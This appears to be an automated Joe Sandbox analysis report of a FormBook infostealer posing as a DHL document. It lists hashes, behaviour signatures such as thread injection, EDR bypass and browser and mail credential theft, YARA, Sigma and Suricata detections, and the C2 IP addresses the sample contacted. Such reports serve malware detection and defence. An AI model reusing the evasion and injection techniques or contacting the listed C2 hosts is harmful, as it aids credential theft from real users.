Edit tour

Windows Analysis Report
DHL DOCS 2-0106-25.exe

Overview

General Information

Sample name:	DHL DOCS 2-0106-25.exe
Analysis ID:	1585261
MD5:	4210cbb8a0431dfcb5d8d945acac3e83
SHA1:	158648ec39528d55bf6d1e93160a0d1f4cc0caf9
SHA256:	25903a945ab1f8a5e285227017e580b88efb235a746d138532c71182d3f8be08
Tags:	exeuser-TeamDreier
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

DHL DOCS 2-0106-25.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe" MD5: 4210CBB8A0431DFCB5D8D945ACAC3E83)

svchost.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

MSNzUrVSel.exe (PID: 3752 cmdline: "C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

unlodctr.exe (PID: 7792 cmdline: "C:\Windows\SysWOW64\unlodctr.exe" MD5: EAF86537E26CC81C0767E58F66E01F52)

MSNzUrVSel.exe (PID: 5004 cmdline: "C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7992 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.1931217148.00000000029B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4113279367.0000000003520000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1930912470.0000000000410000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4113355046.0000000003570000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4115406780.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4113347590.00000000041A0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4111924093.0000000002F80000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1931729344.0000000004750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.410000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.410000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe", CommandLine: "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe", ParentImage: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe, ParentProcessId: 7480, ParentProcessName: DHL DOCS 2-0106-25.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe", ProcessId: 7496, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe", CommandLine: "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe", ParentImage: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe, ParentProcessId: 7480, ParentProcessName: DHL DOCS 2-0106-25.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe", ProcessId: 7496, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T12:22:34.557937+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49736	84.32.84.32	80	TCP
2025-01-07T12:23:44.920953+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49817	188.114.97.3	80	TCP
2025-01-07T12:23:58.398809+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50010	199.59.243.228	80	TCP
2025-01-07T12:24:12.814573+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50014	162.251.95.62	80	TCP
2025-01-07T12:24:27.026424+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50018	134.122.135.48	80	TCP
2025-01-07T12:24:41.322036+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50022	172.67.148.216	80	TCP
2025-01-07T12:24:58.680190+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50026	47.83.1.90	80	TCP
2025-01-07T12:25:12.174421+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50030	199.192.21.169	80	TCP
2025-01-07T12:25:33.507440+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50034	188.114.97.3	80	TCP
2025-01-07T12:25:47.802562+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50038	47.83.1.90	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T12:22:34.557937+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49736	84.32.84.32	80	TCP
2025-01-07T12:23:44.920953+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49817	188.114.97.3	80	TCP
2025-01-07T12:23:58.398809+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50010	199.59.243.228	80	TCP
2025-01-07T12:24:12.814573+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50014	162.251.95.62	80	TCP
2025-01-07T12:24:27.026424+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50018	134.122.135.48	80	TCP
2025-01-07T12:24:41.322036+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50022	172.67.148.216	80	TCP
2025-01-07T12:24:58.680190+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50026	47.83.1.90	80	TCP
2025-01-07T12:25:12.174421+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50030	199.192.21.169	80	TCP
2025-01-07T12:25:33.507440+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50034	188.114.97.3	80	TCP
2025-01-07T12:25:47.802562+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50038	47.83.1.90	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T12:22:59.295922+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49764	188.114.97.3	80	TCP
2025-01-07T12:23:01.842612+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49785	188.114.97.3	80	TCP
2025-01-07T12:23:04.389822+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49801	188.114.97.3	80	TCP
2025-01-07T12:23:50.755834+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50007	199.59.243.228	80	TCP
2025-01-07T12:23:53.313917+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50008	199.59.243.228	80	TCP
2025-01-07T12:23:55.881571+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50009	199.59.243.228	80	TCP
2025-01-07T12:24:05.167520+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50011	162.251.95.62	80	TCP
2025-01-07T12:24:07.878619+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50012	162.251.95.62	80	TCP
2025-01-07T12:24:10.265406+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50013	162.251.95.62	80	TCP
2025-01-07T12:24:19.394126+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50015	134.122.135.48	80	TCP
2025-01-07T12:24:21.947040+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50016	134.122.135.48	80	TCP
2025-01-07T12:24:24.468179+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50017	134.122.135.48	80	TCP
2025-01-07T12:24:33.732656+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50019	172.67.148.216	80	TCP
2025-01-07T12:24:36.281477+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50020	172.67.148.216	80	TCP
2025-01-07T12:24:38.967109+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50021	172.67.148.216	80	TCP
2025-01-07T12:24:47.935765+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50023	47.83.1.90	80	TCP
2025-01-07T12:24:50.482601+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50024	47.83.1.90	80	TCP
2025-01-07T12:24:53.032006+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50025	47.83.1.90	80	TCP
2025-01-07T12:25:04.371432+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50027	199.192.21.169	80	TCP
2025-01-07T12:25:06.991338+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50028	199.192.21.169	80	TCP
2025-01-07T12:25:09.669230+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50029	199.192.21.169	80	TCP
2025-01-07T12:25:25.847650+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50031	188.114.97.3	80	TCP
2025-01-07T12:25:28.403224+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50032	188.114.97.3	80	TCP
2025-01-07T12:25:30.937320+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50033	188.114.97.3	80	TCP
2025-01-07T12:25:40.060493+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50035	47.83.1.90	80	TCP
2025-01-07T12:25:42.607364+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50036	47.83.1.90	80	TCP
2025-01-07T12:25:45.155337+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50037	47.83.1.90	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DHL DOCS 2-0106-25.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: DHL DOCS 2-0106-25.exe	ReversingLabs: Detection: 52%
Source: DHL DOCS 2-0106-25.exe	Virustotal: Detection: 29%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1931217148.00000000029B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4113279367.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1930912470.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4113355046.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4115406780.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4113347590.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4111924093.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1931729344.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: DHL DOCS 2-0106-25.exe

Joe Sandbox ML: detected

Source: DHL DOCS 2-0106-25.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: unlodctr.pdbGCTL source: svchost.exe, 00000001.00000003.1898083135.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, MSNzUrVSel.exe, 00000003.00000002.4112336579.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MSNzUrVSel.exe, 00000003.00000002.4111917290.0000000000B8E000.00000002.00000001.01000000.00000005.sdmp, MSNzUrVSel.exe, 00000007.00000002.4112705389.0000000000B8E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL DOCS 2-0106-25.exe, 00000000.00000003.1655948810.0000000003850000.00000004.00001000.00020000.00000000.sdmp, DHL DOCS 2-0106-25.exe, 00000000.00000003.1656713658.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1931359522.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1836017240.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1838007778.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1931359522.0000000003000000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000003.1933601891.00000000037C6000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000003.1931089805.0000000003610000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4113794857.0000000003970000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4113794857.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL DOCS 2-0106-25.exe, 00000000.00000003.1655948810.0000000003850000.00000004.00001000.00020000.00000000.sdmp, DHL DOCS 2-0106-25.exe, 00000000.00000003.1656713658.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1931359522.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1836017240.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1838007778.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1931359522.0000000003000000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, unlodctr.exe, 00000004.00000003.1933601891.00000000037C6000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000003.1931089805.0000000003610000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4113794857.0000000003970000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4113794857.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: unlodctr.pdb source: svchost.exe, 00000001.00000003.1898083135.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, MSNzUrVSel.exe, 00000003.00000002.4112336579.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: unlodctr.exe, 00000004.00000002.4112047770.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4114712280.0000000003F9C000.00000004.10000000.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000000.2002287566.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2224402166.000000003D13C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: unlodctr.exe, 00000004.00000002.4112047770.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4114712280.0000000003F9C000.00000004.10000000.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000000.2002287566.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2224402166.000000003D13C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_002268EE FindFirstFileW,FindClose,	0_2_002268EE
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0022698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0022698F
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0021D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0021D076
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0021D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0021D3A9
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00229642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00229642
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0022979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0022979D
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00229B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00229B2B
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0021DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0021DBBE
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00225C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00225C97
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F9C640 FindFirstFileW,FindNextFileW,FindClose,	4_2_02F9C640

Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4x nop then xor eax, eax	4_2_02F89F70
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4x nop then pop edi	4_2_02F8E335
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_037B0530

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49801 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49785 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49817 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49817 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 162.251.95.62:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 162.251.95.62:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50010 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 172.67.148.216:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50010 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 172.67.148.216:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50009 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 172.67.148.216:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50030 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50014 -> 162.251.95.62:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50014 -> 162.251.95.62:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50008 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50007 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 162.251.95.62:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 172.67.148.216:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50018 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 172.67.148.216:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50038 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50034 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 47.83.1.90:80
